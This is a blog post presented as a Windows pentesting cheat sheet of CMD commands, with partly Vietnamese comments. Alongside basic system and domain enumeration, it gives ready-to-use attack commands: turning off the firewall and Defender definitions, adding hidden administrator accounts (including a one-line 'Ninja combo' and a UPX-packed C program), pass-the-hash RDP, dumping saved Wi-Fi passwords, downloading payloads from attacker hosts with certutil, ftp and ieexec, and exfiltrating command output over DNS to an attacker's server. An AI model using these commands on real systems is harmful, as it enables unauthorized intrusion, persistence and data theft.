• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

If you want to hack Windows you need to know these CMD commands

AnonyViet by AnonyViet
January 26, 2023
in Security
0

In this article, I will list the most common and basic CMD commands that Windows pentesters often use. Because this article is very technical in nature, I will not explain those commands in detail. But only briefly about the effect of the command. If you cannot use any command, then 1 is that you entered the wrong syntax, 2 is that the command is not installed on the system so it cannot be used.

Join the channel Telegram of the AnonyViet 👉 Link 👈

If you want to hack Windows you need to know these CMD commands

System-related CMD commands for Pentester

First of all, why when hacking into Windows you need to know these basic commands. Because once you have enabled Shell on Windows, the next thing you need to do is turn off the Firewall, create a backup User for later Login again…

So mastering the commands below the Pentester will save more time when exploiting Windows vulnerabilities.

cmd to hack windows

Version and patch information

View system architecture: wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture

Full system information: systeminfo

View OS name and version: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

View patch: wmic qfe get Caption,Description,HotFixID,InstalledOn

Hostname: hostname

View third-party drivers: DRIVERQUERY 

Environment

List all environment variables: set

Some env variables to know:

  • COMPUTERNAME: Computer name
  • TEMP/TMP: Temp folder (save temporary files)
  • USERNAME: Username
  • HOMEPATH/USERPROFILE: Home Links
  • windir: C:\Windows
  • LOGONSERVER: Name of domain controller
  • USERDNSDOMAIN: Domain using DNS
  • USERDOMAIN: Domain Name

DNS request for PC: nslookup %LOGONSERVER%.%USERDNSDOMAIN%

Drive is connected

wmic logicaldisk get caption 2
wmic logicaldisk get caption,description,providername

Anti Virus

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
sc query windefend
Delete the privacy rules of Defender (intentional for machines without internet): "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Recycle Bin

dir C:\$Recycle.Bin /s /b

Processes, Services & Software

Details of scheduled tasks:

schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
List of processes: tasklist /V

Processes that enable services: tasklist /SVC

Active Windows Services: net start

List of services: wmic service list briefor sc query

Installed 64bit software: dir /a “C:\Program Files”

Installed 32bit softwares: dir /a "C:\Program Files (x86)"

Installed software: reg query HKEY_LOCAL_MACHINE\SOFTWARE

Domain Information

echo %USERDOMAIN% #Tên Domain
echo %USERDNSDOMAIN% #Tên Domain khi máy tính có đăng nhập vào Domain
echo %logonserver% #Tên domain controller
set logonserver #Tên domain controller
set log #Tên domain controller
net groups /domain #Danh sách domain group
net group "domain computers" /domain #Danh sách PC đã kết nối với domain
net view /domain #Danh sách PC của domain
nltest /dclist:<DOMAIN> #Danh sách domain controllers
net group "Domain Controllers" /domain #Danh sách tài khoản PC của domains controllers
net group "Domain Admins" /domain #Danh sách user có đặc quyền quản trị domain
net localgroup administrators /domain #Danh sách các admin group bên trong domain (bao gồm cả group "Domain Admins")
net user /domain #Danh sách tất cả user của domain
net user <ACCOUNT_NAME> /domain #Thông tin về user
net accounts /domain #View the domain’s current password and login limit
nltest /domain_trust #Mapping domain relationships

Logs & Events

Make a security query using the credentials: wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321

Users & Groups

Users

whoami /all #Tất cả thông tin về bạn
whoami /priv #Show only privileges
net users #Tất cả các user
dir /b /ad "C:\Users"
net user %username% #Thông tin về user (bạn)
net accounts #Thông tin về mật khẩu
qwinsta #Có ai khác đã đăng nhập không?
cmdkey /list #Danh sách các chứng chỉ
net user /add [username] [password] #Tạo user

#Mở cmd.exe mới với các creds mới (để mạo danh trong mạng)
runas /netonly /user:<USERNAME>\administrator cmd

#Kiểm tra phiên đăng nhập hiện tại với tư cách là quản trị viên bằng cách sử dụng phiên đăng nhập từ sysinternals. Đọc thêm here
logonsessions.exe
logonsessions64.exe

Groups

#Local
net localgroup #All groups exist
net localgroup Administrators #Thông tin về group group (admins)
net localgroup administrators [username] /add #Thêm người dùng vào administrators

#Domain
net group /domain #Thông tin về group domain
net group /domain <domain_group_name> #Người dùng thuộc group

List of sessions

qwinsta
klist sessions

Password Policy

net accounts

Add users to the group

# Thêm user domain vào Group Domain Admins
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Thêm local user vào group local Admins
net user username password /ADD
net localgroup Administrators username /ADD

# Thêm user vào các group khác:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

Network

Interfaces, Routes, Ports, Hosts and DNSCache

ipconfig /all #Thông tin về interfaces
route print #Xem các routes hiện cóó
arp -a #Thông tin về host
netstat -ano #Các port đang mởở
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"

Firewall

Information about the firewall and open ports:

netsh firewall show state
netsh advfirewall firewall show rule name=all
netsh firewall show config # Thông tin firewall
Netsh Advfirewall show allprofiles
Turn off and on the firewall:

NetSh Advfirewall set allprofiles state off #Tắt Firewall
NetSh Advfirewall set allprofiles state on #Bật Firewall
netsh firewall set opmode disable #Tắt firewall
How to open ports:

netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
Enable Remote Desktop:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"

::netsh firewall set service remotedesktop enable #Không cần thiết
::sc config TermService start= auto #Unnecessary
::net start Termservice #Không cần thiết
Turn on Remote assistance:

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
Ninja combo (new admin user, allow RDP + Rassistance + Firewall)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup “Remote Desktop Users” hacker /add & reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add “ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 “Remote Desktop” & netsh firewall set service remoteadmin enable
Connect to RDP (using hash or password)

xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

Share

net view #Lấy danh sách máy tính
net view /all /domain [domainname] #Shares trên domains
net view \\computer /ALL #danh sách máy tính tham gia share
net use x: \\computer\share #Kết nối ổ với share
net share #Check current share

WIFI

netsh wlan show profile #Xem SSID của wifi từng kết nối

netsh wlan show profile <SSID> key=clear #Xem mật khẩu wifi

SNMP

Read this article to know what is SNMP?

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Network Interfaces

ipconfig /all

ARP

arp -A

Download

Bitsadmin.exe

bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
CertReq.exe
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Certutil.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
Desktopimgdownldr.exe
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Diantz.exe

diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab

Esentutl.exe

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

Expand.exe

expand \\webdav\folder\file.bat c:\ADS\file.bat

Extract32.exe

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Findstr.exe

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe

Ftp.exe

cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

GfxDownloadWrapper.exe

C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

Hh.exe

HH.exe http://some.url/script.ps1

ieexec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab.exe

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

MpCmdRun.exe

MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable

Replace.exe

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A

Excel.exe

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Powerpnt.exe

Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Squirrel.exe

squirrel.exe --download [url to package]

Update.exe

Update.exe --download [url to package]

Winword.exe

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Wsl.exe

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Misc

cd #Đường dẫn hiện tại
cd folder #Truy cập vào thư mục
dir #Danh sách các thư mục và file trong đường dẫn hiện tại
dir /a:h *path #Danh sách các file ẩn
dir /s /b #Tất cả đường dẫn trong
time #Thời gian hiện tại
date #Ngày hiện tại
shutdown /r /t 0 #Tắt máy tính ngay lập tức
type <file> #Đọc file
Runas

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
Hide files

attrib +h file #Bật ẩn file
attrib -h file #Tắt ẩn file
Gives full control over the files you have

icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Xóa quyền
Recursively copy files
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
ADS (What is ADS?)

dir /r #Phát hiện ADS
more file.txt:ads.txt #Đọc ADS
powershell (Get-Content file.txt -Stream ads.txt)

Listen to the ACLs . address

You can listen http://+:80/Temporary_Listen_Addresses/ without admin rights
netsh http show urlacl

DNS shell

You use one of the following 2 options:

sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive

Victim
Skill for /f tokens _**_: Lets me execute the command, taking the first X word of each line and sending it via DNS to my server.

for /f %a in ('whoami') do nslookup %a <IP_kali> 
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> 
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #Danh sách thư mục
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #Liệt kê các thư mục đó
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Giống lệnh trước đó
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Giống lệnh trước đó

You can also redirect the output and then read it.

whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>

Calling CMD from code C

#include <stdlib.h>

// Khi file được thực thi bởi Admin, chương trình này sẽ tạo một user và sau đó thêm user đó vào nhóm Admin
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe

int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}

The above are the basic pentest cmd commands for Windows, those who want to learn more about pentester can go to Anonyviet’s new Discord server Please.

The article achieved: 5/5 – (101 votes)

Tags: CMDcommandsHackWindows
Previous Post

[Tạo 2D Platformer Game với Godot] Part 29: Saving and loading game data

Next Post

How to convert Office 2021 Retail to Office 2021 VL (Volume)

AnonyViet

AnonyViet

Related Posts

How to use hackers use Splitfus to execute PowerShell malicious code
Security

How to use hackers use Splitfus to execute PowerShell malicious code

July 20, 2025
How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Capsolver: Automatic solution solution for business
Security

Capsolver: Automatic solution solution for business

December 12, 2024
Next Post
How to convert Office 2021 Retail to Office 2021 VL (Volume)

How to convert Office 2021 Retail to Office 2021 VL (Volume)

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

How to add application to your favorite bar

How to add application to your favorite bar

August 14, 2025
Wowhay.com – The door opens the world of modern knowledge and network culture

Wowhay.com – The door opens the world of modern knowledge and network culture

August 13, 2025
Instructions on how to fix Screen Time Limited Reached on RoBlox

Instructions on how to fix Screen Time Limited Reached on RoBlox

August 13, 2025
How to install GPT-suns on who do not need the Internet

How to install GPT-suns on who do not need the Internet

August 12, 2025
How to add application to your favorite bar

How to add application to your favorite bar

August 14, 2025
Wowhay.com – The door opens the world of modern knowledge and network culture

Wowhay.com – The door opens the world of modern knowledge and network culture

August 13, 2025
Instructions on how to fix Screen Time Limited Reached on RoBlox

Instructions on how to fix Screen Time Limited Reached on RoBlox

August 13, 2025
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

How to add application to your favorite bar

How to add application to your favorite bar

August 14, 2025
Wowhay.com – The door opens the world of modern knowledge and network culture

Wowhay.com – The door opens the world of modern knowledge and network culture

August 13, 2025
  • Home
  • Home 2
  • Home 3
  • Home 4
  • Home 5
  • Home 6
  • Next Dest Page
  • Sample Page

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí mm88 8XBET mm88 trang chủ new88

No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí mm88 8XBET mm88 trang chủ new88

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply